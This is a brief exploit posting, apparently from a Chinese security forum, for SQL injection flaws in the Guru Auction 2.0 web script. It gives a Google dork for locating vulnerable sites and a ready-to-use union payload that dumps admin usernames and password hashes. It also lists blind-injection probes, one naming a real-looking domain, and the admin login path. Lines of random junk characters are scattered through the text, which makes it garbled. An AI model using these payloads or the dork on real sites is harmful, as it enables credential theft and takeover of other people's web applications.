Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
# W% K+ e* p! }0 v- C% @" r; \! F. S( u: v1 _
作者 : v3n0m3 l6 ], G! L' i% v( ]
应用 : Guru Auction 2.01 C0 N2 X$ O$ O# ?/ ?
Price : $49: k3 d8 g+ J7 `% b% a1 F$ Y
Vendor : http://www.guruscript.com/. m2 b/ D7 R6 Q( `# J1 A5 G
Google Dork : inurl:subcat.php?cate_id=* f* S! C; P2 u: Q
6 {: G; o7 f* ~! g
SQLi p0c:5 S( x; o9 |% Y
~~~~~~~~~~
8 C% K! c0 X& `http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
" ^0 ?2 q$ C$ Q& h- [) o* o5 w
* E2 s: b: o! ^3 m: A- ? : m8 N" D9 P! B
盲注 p0c:( U9 |$ w- h% q, _ \2 m
~~~~~~~~~~. ]' I) y* Y6 i% G8 m
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
" A% z) {0 y, } M9 nhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false# g n# p' k y0 C
8 J! t ?: O. r. W1 y: P! ?
管理登录入口:
6 E+ C& E6 ]1 v" o8 Z~~~~~~~~~~
) w2 f5 h- F" V& lhttp://domain.tld/[path]/admin/
# v( ?" ]; H: Y0 V9 u1 G( t B( h- C: B |